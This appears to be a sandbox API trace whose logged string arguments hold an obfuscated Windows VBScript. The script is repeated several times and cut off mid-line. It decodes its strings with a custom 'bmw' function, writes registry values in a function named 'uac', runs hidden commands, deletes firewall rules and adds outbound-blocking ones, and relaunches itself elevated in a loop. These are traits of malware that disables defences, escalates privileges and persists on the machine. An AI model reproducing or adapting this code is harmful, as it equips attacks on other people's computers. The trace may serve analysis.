bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.977] wcsncmp (_String1="r2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.977] wcsncmp (_String1="2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0222.977] wcsncmp (_String1=")\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.977] wcsncmp (_String1="\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", 